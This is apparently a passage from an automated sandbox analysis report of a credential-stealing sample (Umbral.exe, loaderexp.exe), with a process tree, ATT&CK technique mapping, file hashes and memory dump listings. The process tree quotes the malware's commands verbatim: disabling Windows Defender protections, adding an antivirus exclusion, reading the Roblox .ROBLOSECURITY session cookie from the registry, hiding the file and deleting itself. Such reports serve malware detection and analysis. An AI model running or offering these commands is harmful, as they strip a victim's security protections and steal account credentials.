    - - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        5⤵
        
        PID:2400
    - - C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        5⤵
        Views/modifies file attributes
        
        PID:376
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:860
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:348
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2844
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2660
    - - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        5⤵
        
        PID:1648
    - - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        5⤵
        
        PID:2896
    - - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        5⤵
        
        PID:1812
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2876
    - - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:2912
    - - C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1320
      - C:\Windows\system32\PING.EXE
        
        ping localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1784
- - C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
    "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
    3⤵
    - Executes dropped EXE
    PID:1892
- - C:\Users\Admin\AppData\Local\Temp\Umbral.exe
    "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
    3⤵
    - Executes dropped EXE
    PID:2360
- C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
  "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
  2⤵
  - Executes dropped EXE
  PID:2224
- C:\Users\Admin\AppData\Local\Temp\Umbral.exe
  "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2736
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2800
- - C:\Windows\system32\attrib.exe
    "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
    3⤵
    - Views/modifies file attributes
    PID:2600
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2640
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:620
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1320
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2648
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2432
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    PID:2244
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:2392
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:2768
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:280
- - C:\Windows\system32\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Suspicious use of WriteProcessMemory
    PID:2020
  - - C:\Windows\system32\PING.EXE
      ping localhost
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:1536

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1359641764-1388108509563899535-153626063616871115202449157061379948049-1280600349"
1⤵
PID:2224

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-127825032186540211210681171115765496411022698911207645685-325871731-489724404"
1⤵
PID:2768

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\6Rt6Z1zpilkmrZ6

Filesize
20KB

MD5
c9ff7748d8fcef4cf84a5501e996a641

SHA1
02867e5010f62f97ebb0cfb32cb3ede9449fe0c9

SHA256
4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988

SHA512
d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

Download Submit
C:\Users\Admin\AppData\Local\Temp\G2OuovGJrEh4Ylb

Filesize
46KB

MD5
02d2c46697e3714e49f46b680b9a6b83

SHA1
84f98b56d49f01e9b6b76a4e21accf64fd319140

SHA256
522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9

SHA512
60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

Download Submit
C:\Users\Admin\AppData\Local\Temp\Umbral.exe

Filesize
229KB

MD5
35bfad8beb24021798e8410c299fb64a

SHA1
064970ecd6e29be2cb5da7cb73f718e326e1b785

SHA256
73ce24ee931d0a3fd27a395bad1b3b45a8c7a2f1841432868ee0e9a16ea56c4e

SHA512
d95d9ffbd89cbea4958eec3e4a4544d87112bff4a35acbc43a4705b4f5c1d2709831a75e6a7838be7359c8033bb3a08e89ad33b743b548c0b95b631666ad1584

Download Submit
C:\Users\Admin\AppData\Local\Temp\iFYsaqDj3u4NFJi\Display\Display.png

Filesize
403KB

MD5
f9165d0585a939b9f46fff9f4e673c00

SHA1
cb11a20d9010a8ba07dab984d167b37df3ac440c

SHA256
dab0f404e035000c1352dab2ab50a768f56f7f42c92c27f46e53ee6a3fb2a0d5

SHA512
eceef89fb95a8bbb2e96be1556e5cbfe67fb7b8152c528e10bce905d43b9c9b91f827a6963c0a8c92096b1dba3a8476e1d6fad828baf6a5bb227bc3e0bef893e

Download Submit
C:\Users\Admin\AppData\Local\Temp\loaderexp.exe

Filesize
407KB

MD5
1beb7aa96b112bf1cdea3f8ae277002a

SHA1
0a846c4794c62694c8765f0b8e58ea9e807e2a97

SHA256
a62b25c555f2e0943d0494fd88ee92b7fe64b17ee3f9ee294cd6f9f1362a63ed

SHA512
9667870c6994936d3e8fdd46b87feb701320552a707b9728ef53cdef995bd765729856f8f6af08800e4ea5db8905c9bf1bf5c9ed7fcf657500283f55fecaa056

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JYKCCPWRY5OHJ172BXEL.temp

Filesize
7KB

MD5
3719ab41648ebf92ac2dc65a408e2cd9

SHA1
f73a233caac1dd48b798f08adbbc8d4837ba2518

SHA256
958b4ecd938b170205f0ef84e3d85a3244a77451c7777cd8121683a945084ced

SHA512
d9e07a6caa995a712e9c7e9ed5c93727e4baa04d4af8889ed6af070ab0b64e9a6581fe80fe76c2236b1d330cf9e744247bf1fee6a698994aa105b3c085ab19b4

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
577f27e6d74bd8c5b7b0371f2b1e991c

SHA1
b334ccfe13792f82b698960cceaee2e690b85528

SHA256
0ade9ef91b5283eceb17614dd47eb450a5a2a371c410232552ad80af4fbfd5f9

SHA512
944b09b6b9d7c760b0c5add40efd9a25197c22e302c3c7e6d3f4837825ae9ee73e8438fc2c93e268da791f32deb70874799b8398ebae962a9fc51c980c7a5f5c

Download Submit
memory/596-130-0x0000000000080000-0x00000000000C0000-memory.dmp

Filesize
256KB

Download
memory/620-28-0x000000001B720000-0x000000001BA02000-memory.dmp

Filesize
2.9MB

Download
memory/620-29-0x0000000001DE0000-0x0000000001DE8000-memory.dmp

Filesize
32KB

Download
memory/988-185-0x00000000003E0000-0x000000000044A000-memory.dmp

Filesize
424KB

Download
memory/1232-211-0x0000000000040000-0x00000000000AA000-memory.dmp

Filesize
424KB

Download
memory/1464-241-0x0000000000CF0000-0x0000000000D5A000-memory.dmp

Filesize
424KB

Download
memory/1596-75-0x00000000011F0000-0x0000000001230000-memory.dmp

Filesize
256KB

Download
memory/1740-242-0x00000000008F0000-0x0000000000930000-memory.dmp

Filesize
256KB

Download
memory/1844-187-0x00000000002C0000-0x0000000000300000-memory.dmp

Filesize
256KB

Download
memory/1872-273-0x00000000008A0000-0x000000000090A000-memory.dmp

Filesize
424KB

Download
memory/1888-302-0x0000000000AC0000-0x0000000000B2A000-memory.dmp

Filesize
424KB

Download
memory/1892-57-0x0000000000310000-0x000000000037A000-memory.dmp

Filesize
424KB

Download
memory/2024-282-0x0000000000960000-0x00000000009CA000-memory.dmp

Filesize
424KB

Download
memory/2128-16-0x000007FEF5E90000-0x000007FEF687C000-memory.dmp

Filesize
9.9MB

Download
memory/2128-2-0x000007FEF5E90000-0x000007FEF687C000-memory.dmp

Filesize
9.9MB

Download
memory/2128-0-0x000007FEF5E93000-0x000007FEF5E94000-memory.dmp

Filesize
4KB

Download
memory/2128-1-0x000000013F430000-0x00000001403AC000-memory.dmp

Filesize
15.5MB

Download
memory/2160-128-0x00000000011C0000-0x000000000122A000-memory.dmp

Filesize
424KB

Download
memory/2224-10-0x0000000000E90000-0x0000000000EFA000-memory.dmp

Filesize
424KB

Download
memory/2360-119-0x0000000001110000-0x000000000117A000-memory.dmp

Filesize
424KB

Download
memory/2380-73-0x0000000001020000-0x000000000108A000-memory.dmp

Filesize
424KB

Download
memory/2608-171-0x0000000000930000-0x000000000099A000-memory.dmp

Filesize
424KB

Download
memory/2640-22-0x00000000028E0000-0x00000000028E8000-memory.dmp

Filesize
32KB

Download
memory/2640-21-0x000000001B590000-0x000000001B872000-memory.dmp

Filesize
2.9MB

Download
memory/2736-15-0x0000000000E10000-0x0000000000E50000-memory.dmp

Filesize
256KB

Download
memory/2768-64-0x0000000001E80000-0x0000000001E88000-memory.dmp

Filesize
32KB

Download
memory/2776-58-0x000007FEF5E90000-0x000007FEF687C000-memory.dmp

Filesize
9.9MB

Download
memory/2776-11-0x000007FEF5E90000-0x000007FEF687C000-memory.dmp

Filesize
9.9MB

Download
memory/2800-281-0x0000000000A80000-0x0000000000AC0000-memory.dmp

Filesize
256KB

Download